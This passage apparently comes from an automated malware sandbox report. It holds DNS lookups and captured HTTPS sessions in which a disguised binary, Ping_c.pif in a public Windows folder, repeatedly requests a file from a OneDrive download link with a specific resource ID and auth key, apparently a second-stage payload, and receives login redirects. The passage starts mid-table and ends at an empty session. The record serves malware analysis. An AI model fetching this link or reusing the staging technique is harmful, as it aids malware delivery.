                            Sep 21, 2024 16:22:42.706172943 CEST | 1.1.1.1 | 192.168.2.8 | 0x32c5 | Name error (3) | 183.59.114.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                            Sep 21, 2024 16:22:45.355413914 CEST | 1.1.1.1 | 192.168.2.8 | 0x6e3f | No error (0) | onedrive.live.com | web.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001) | false
                            Sep 21, 2024 16:22:45.355413914 CEST | 1.1.1.1 | 192.168.2.8 | 0x6e3f | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
                            Sep 21, 2024 16:22:45.355413914 CEST | 1.1.1.1 | 192.168.2.8 | 0x6e3f | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
                            Sep 21, 2024 16:22:45.355413914 CEST | 1.1.1.1 | 192.168.2.8 | 0x6e3f | No error (0) | dual-spov-0006.spov-msedge.net |  | 13.107.137.11 | A (IP address) | IN (0x0001) | false
                            Sep 21, 2024 16:22:45.355413914 CEST | 1.1.1.1 | 192.168.2.8 | 0x6e3f | No error (0) | dual-spov-0006.spov-msedge.net |  | 13.107.139.11 | A (IP address) | IN (0x0001) | false
                            Sep 21, 2024 16:23:24.359759092 CEST | 1.1.1.1 | 192.168.2.8 | 0xd96f | No error (0) | onedrive.live.com | web.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001) | false
                            Sep 21, 2024 16:23:24.359759092 CEST | 1.1.1.1 | 192.168.2.8 | 0xd96f | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
                            Sep 21, 2024 16:23:24.359759092 CEST | 1.1.1.1 | 192.168.2.8 | 0xd96f | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
                            Sep 21, 2024 16:23:24.359759092 CEST | 1.1.1.1 | 192.168.2.8 | 0xd96f | No error (0) | dual-spov-0006.spov-msedge.net |  | 13.107.137.11 | A (IP address) | IN (0x0001) | false
                            Sep 21, 2024 16:23:24.359759092 CEST | 1.1.1.1 | 192.168.2.8 | 0xd96f | No error (0) | dual-spov-0006.spov-msedge.net |  | 13.107.139.11 | A (IP address) | IN (0x0001) | false
                            Sep 21, 2024 16:24:01.516952991 CEST | 1.1.1.1 | 192.168.2.8 | 0x4a71 | No error (0) | onedrive.live.com | web.fe.1drv.com |  | CNAME (Canonical name) | IN (0x0001) | false
                            Sep 21, 2024 16:24:01.516952991 CEST | 1.1.1.1 | 192.168.2.8 | 0x4a71 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net |  | CNAME (Canonical name) | IN (0x0001) | false
                            Sep 21, 2024 16:24:01.516952991 CEST | 1.1.1.1 | 192.168.2.8 | 0x4a71 | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
                            Sep 21, 2024 16:24:01.516952991 CEST | 1.1.1.1 | 192.168.2.8 | 0x4a71 | No error (0) | dual-spov-0006.spov-msedge.net |  | 13.107.137.11 | A (IP address) | IN (0x0001) | false
                            Sep 21, 2024 16:24:01.516952991 CEST | 1.1.1.1 | 192.168.2.8 | 0x4a71 | No error (0) | dual-spov-0006.spov-msedge.net |  | 13.107.139.11 | A (IP address) | IN (0x0001) | false
                            • onedrive.live.com
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.8 | 49708 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:22:19 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:19 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928539&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:3gMxzUja3Ig=:90UExNJOZxytETRjMRLgRRbjAQtHFBa1gINhKJwoDak=:F; domain=.live.com; path=/
                            Set-Cookie: xid=cd8b19c8-82e9-46f1-ad1f-ea7ad0fef045&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:19 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:19 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-jf4m8
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 2FBC2BB15ED04726A761A2B383DA3CBC Ref B: BN3EDGE0721 Ref C: 2024-09-21T14:22:19Z
                            Date: Sat, 21 Sep 2024 14:22:19 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.8 | 49713 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:22:23 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:23 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928543&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:VLCCz0ja3Ig=:sKKnNqSnFKBT+zXFSFXHY6u0ptIS7ruZKeid+kTIXWc=:F; domain=.live.com; path=/
                            Set-Cookie: xid=8aa6156f-920e-44d7-a273-395db3893c4a&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:23 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:23 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-nj9k4
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: BF2BA078D6BB4CE28B4E02C4E8B62CEE Ref B: BN3EDGE0208 Ref C: 2024-09-21T14:22:23Z
                            Date: Sat, 21 Sep 2024 14:22:23 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            2 | 192.168.2.8 | 49720 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:22:27 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:27 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928547&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:R07H0Uja3Ig=:cpy/dqNRy4NEElTfm46QVlIFiBGUtZUwMBqIwgYXxsU=:F; domain=.live.com; path=/
                            Set-Cookie: xid=253fe706-c178-4ba5-9f90-2b2ad8d6f501&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:27 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:27 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-874vg
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 60EE4EEC43B249F19DE41CEBEEB4CE57 Ref B: BN3EDGE0217 Ref C: 2024-09-21T14:22:27Z
                            Date: Sat, 21 Sep 2024 14:22:26 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            3 | 192.168.2.8 | 49723 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:22:30 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:31 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928551&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:UEDy00ja3Ig=:e/zSLWP1KyCMBo5HU+JVCDoWwNwtS7VbR5faLe8uG6g=:F; domain=.live.com; path=/
                            Set-Cookie: xid=2c13b073-244e-48ce-b7ce-f7bd91aa6e8c&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:30 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:31 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-gq7j8
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 196B57C0F3424B1CBF3EB52260533C82 Ref B: BN3EDGE0712 Ref C: 2024-09-21T14:22:30Z
                            Date: Sat, 21 Sep 2024 14:22:31 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            4 | 192.168.2.8 | 49726 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:22:34 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:34 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928554&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:ECf01Uja3Ig=:YWCl9loI149/lkCDKNNLW2wJQOw30kF1Bb2LnVqgP0A=:F; domain=.live.com; path=/
                            Set-Cookie: xid=4e11a88b-b9fd-4afd-90fe-1f69107171dd&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:34 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:34 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-jsmqf
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 093F945EF5724E97A375FF3759C8EE7E Ref B: BN3EDGE0208 Ref C: 2024-09-21T14:22:34Z
                            Date: Sat, 21 Sep 2024 14:22:34 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            5 | 192.168.2.8 | 49729 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:22:38 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:38 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928558&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:LduG2Eja3Ig=:UrrrSkYTgzDC81drTE8c1/uSC30Ry6hymVxvS3D0NGs=:F; domain=.live.com; path=/
                            Set-Cookie: xid=93ef7f6b-e040-4a7b-868f-e6e343a33698&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:38 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:38 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-ql9tz
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 4F4A2F226FBB42A2ABD1B6A6AB1E91F3 Ref B: BN3EDGE1019 Ref C: 2024-09-21T14:22:38Z
                            Date: Sat, 21 Sep 2024 14:22:38 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            6 | 192.168.2.8 | 53511 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:22:43 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:43 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928563&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:3atH20ja3Ig=:Z5Wuwha+0/qkjMx0VGEd9YqjlTGD/7ejwCxSneSQZ+8=:F; domain=.live.com; path=/
                            Set-Cookie: xid=2450b662-08f5-4aa6-bf08-ed3227f3fb37&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:43 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:43 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-tzmkb
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: C01D664885314B9E9AF92EFD81F3EA19 Ref B: BN3EDGE0821 Ref C: 2024-09-21T14:22:43Z
                            Date: Sat, 21 Sep 2024 14:22:42 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            7 | 192.168.2.8 | 53516 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:22:46 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:46 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928566&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:iRcc3Uja3Ig=:f+o7mX4X74DL2iA/djpFkwq9PT15dYlfZH2zykYszaw=:F; domain=.live.com; path=/
                            Set-Cookie: xid=07ff36a1-1cf9-4f00-97eb-4c8d83c2db21&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:46 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:46 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-2g6z6
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 2D6D623D1273470A8FA08EAC64306A45 Ref B: BN3EDGE0603 Ref C: 2024-09-21T14:22:46Z
                            Date: Sat, 21 Sep 2024 14:22:46 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            8 | 192.168.2.8 | 53520 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:22:49 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:49 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928569&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:1bEI30ja3Ig=:k+V+Ig4UQHBouhLWgz3GSPPYPaDE9KWUuPiFuwFz+FI=:F; domain=.live.com; path=/
                            Set-Cookie: xid=0042b224-aaae-4cc6-95e2-6997041a4917&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:49 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:49 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-tzmkb
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 57119BA5318A440187BBB3BCBB7766B7 Ref B: BN3EDGE0607 Ref C: 2024-09-21T14:22:49Z
                            Date: Sat, 21 Sep 2024 14:22:49 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            9 | 192.168.2.8 | 53523 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:22:52 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:52 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928572&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:jxbM4Eja3Ig=:q8+CxzZuGEGkyT0zW+LzAAoWS48l+rvmT2XCFC5pPfg=:F; domain=.live.com; path=/
                            Set-Cookie: xid=668e6e9d-29c3-4a24-abe3-be5aa03629eb&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:52 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:52 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-gz268
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 404DA3AE75214668BC9E68503CC8C779 Ref B: BN3EDGE0712 Ref C: 2024-09-21T14:22:52Z
                            Date: Sat, 21 Sep 2024 14:22:52 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            10 | 192.168.2.8 | 53526 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:22:55 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:56 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928575&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:FG2s4kja3Ig=:ozl/a//ZIsRLvkdon0hqYGoFlpmyYoUJIiWAYV2hJMo=:F; domain=.live.com; path=/
                            Set-Cookie: xid=fa8d0370-abef-4aaa-b913-c4e959cde092&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:55 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:55 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-9m949
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 1A2E72B0EDAC4F0DA30BBB4D3D969DDC Ref B: BN3EDGE1118 Ref C: 2024-09-21T14:22:55Z
                            Date: Sat, 21 Sep 2024 14:22:55 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            11 | 192.168.2.8 | 53529 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:22:58 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:22:59 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928579&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:BV+V5Eja3Ig=:kQOxgw9oRNv97eqUcto6AwnBhlxqR9E8/JABHf+U4eY=:F; domain=.live.com; path=/
                            Set-Cookie: xid=a5f73d3b-5d21-470c-92bc-bca3d5ebda15&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:42:58 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:22:59 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-8hd77
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: F1B1F12382214DA4BE617B9ED8F6141E Ref B: BN3EDGE0311 Ref C: 2024-09-21T14:22:58Z
                            Date: Sat, 21 Sep 2024 14:22:58 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            12 | 192.168.2.8 | 53532 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
